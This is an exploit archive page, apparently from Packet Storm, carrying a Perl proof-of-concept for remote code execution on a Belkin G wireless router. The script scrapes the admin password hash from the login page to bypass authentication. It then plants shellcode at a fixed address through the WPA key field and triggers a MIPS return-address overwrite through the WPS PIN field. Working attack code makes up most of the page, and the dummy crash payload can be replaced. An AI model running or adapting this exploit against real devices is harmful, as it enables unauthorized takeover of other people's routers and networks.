what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Belkin G Wireless Router Code Execution

Belkin G Wireless Router Code Execution
Posted Aug 26, 2013
Authored by Aodrulez

Belkin G Wireless Router remote code execution proof of concept exploit.

tags | exploit, remote, code execution, proof of concept
SHA-256 | 43beacbd1d2f3672fb7be34a7a3f2b6f9fabf3623fbe5cb404ae146733cc6365

Belkin G Wireless Router Code Execution

Change Mirror Download
+-----------------------------------+
| Belkin G Wireless Router RCE PoC. |
+-----------------------------------+



Firmware Version : 5.00.12 (Sep 10 2009 19:54:12)
Boot Version : 1.18
Hardware : F5D7234-4 v5 (01)
Author : Aodrulez.
Email : atul.alex@orchidseven.com
Twitter : http://twitter.com/Aodrulez


+---------+
| Details |
+---------+

The exploit works in 3 stages.
1. Authentication.
2. Setting up shellcode in the memory at a known location.
3. Triggering an RA register over-write to execute the shellcode.

This particular model of router is based on 'embedded Configurable operating system' a.k.a (eCos) version 2.0. The shellcode used in the exploit is a dummy one that basically just triggers an exception & crashes the router, forcing it to reboot.


Video Demo :
http://www.youtube.com/watch?v=MtrYs-f6X3E


+---------+
| Exploit |
+---------+

#!/usr/bin/perl

use strict;
use warnings;
use LWP 5.64;
$| = 1;

# Variable declarations.
my $browser = LWP::UserAgent->new;
my $passHash="";
my $url ="";
my $response ="";
my $ip="";
$browser ->timeout(10);


# Just a few nops followed by a dummy shellcode that crashes & reboots the router.
my $shellcode="\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x04\xd0\xff\xff\x20\x20\x20\x20";



sub Authenticate()
{
print "[+] Trying to authenticate.\n";
$url= "http://$ip/login.stm";
$response = $browser->get( $url);
my @aod= $response->content =~ m/var password = "(.*)";/g;
if(!$aod[0])
{
print "[-] Damn! Something went wrong. This might not work here :-/\n";
exit;
}
else
{
$passHash=$aod[0];
print "[+] Admin Password = $passHash (MD5 Hash).\n";
}

print "[+] Time to authenticate you!\n";
$url = "http://$ip/cgi-bin/login.exe";
$response = $browser->post( $url,
[ 'totalMSec' => "1377121454.99",
'pws' => "$passHash",
,]
);

if( $response->content =~ /index/ )
{
print "[+] Logged in successfully as 'Admin'!\n";
print "[!] Open this link in a browser for admin access : http://$ip/setup.htm \n";
} else {
print "[-] Login failed! This might not work here :-/\n";
exit;
}

print "\n[+] Continue with exploitation? (Y/N) : ";
my $temp=<STDIN>;
if ($temp=~"Y" || $temp=~"y")
{
Exploit();
}
else
{
print "[+] Have fun!\n\n";
exit;
}
}


sub Exploit()
{
# Stage 1: Fill shellcode at a known location : 0x803c0278 (Buffer=120 bytes)
# 0x803c0278 is fixed for this device/firmware combination.
print "[+] Stage 1 : Allocating shellcode.\n";

if (length($shellcode) > 120)
{
print "[-] Shellcode is too big! (120 bytes Max)\n";
exit;
}
print "[+] Shellcode length : ".length($shellcode)."\n";

# Fill the rest with nops. Not needed but good to have.
# Shellcode size should be ideally a multiple of 4 as this is MIPS.
my $nopsize=120-length($shellcode);
$shellcode=$shellcode.("\x20"x$nopsize);

$url = "http://$ip/cgi-bin/wireless_WPA.exe";
$response = $browser->post( $url,
[ 'wpa_authen' => "1",
'wpa_psk' => '0',
's_rekeysec' => '900000',
's_rekeypkt' => '1000',
'w802_rekey' => '0',
'encryption' => '3',
'security_type' => '4',
'authentication' => '3',
'encryption_hid' => '3',
'wpa_key_text' => "ssss",
'wpa_key_pass' => "$shellcode",
'obscure_psk' => '1',
'sharedkey_alter' => '',
'sharedkey_alter1' => '1',

,]
);

if( !$response->content )
{
print "[-] Damn! Something went wrong. This might not work here :-/\n";
}
else
{
print "[+] Stage 1 seems to have gone well.\n";
}

# Stage 2: Trigger Stack Overflow & overwrite RA
print "[+] Stage 2 : Triggering Return Address overwrite.\n";

my $junk="A"x32;
my $s0="BBBB";
my $s1="CCCC";
my $ra="\x78\x02\x3c\x80"; #EPC -> 0x803c0278 Fixed for this device/firmware combination.
my $nop="\x20\x20\x20\x20";
my $payload=$junk.$s0.$s1.$ra.$nop;

$url = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe";
$response = $browser->post( $url,[ 'pin' => "$payload"]);
if( !$response->content )
{
print "[-] Damn! Something went wrong. This might not work here :-/\n";
}
else
{
print "[-] Done! \\m/\n";
}

}

sub Welcome()
{
print "\n\n+------------------------------------------+\n";
print "| Belkin G Wireless Router Remote Exploit |\n";
print "| (Authentication bypass & RCE PoC) |\n";
print "+------------------------------------------+\n";
print "[+] By Aodrulez.\n";
print "\n[+] Usage : perl $0 router_ip";
print "\n[!] Example : perl $0 192.168.2.1";

if (!$ARGV[0])
{
print "\n[-] (o_0) Seriously??\n";
exit;
}

$ip=$ARGV[0];
print "\n[+] Target IP : $ip\n";

}

# Burn!!
Welcome();
Authenticate();
# End of exploit code.



+-------------------+
| Greetz Fly Out To |
+-------------------+


1] Amforked() : My Mentor.
2] The Blue Genius : My Boss.
3] str0ke (milw0rm)
4] www.orchidseven.com
5] www.malcon.org
6] www.nsd.org.in


+-------+
| Quote |
+-------+

“I would rather die of passion than of boredom.” - Vincent van Gogh.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close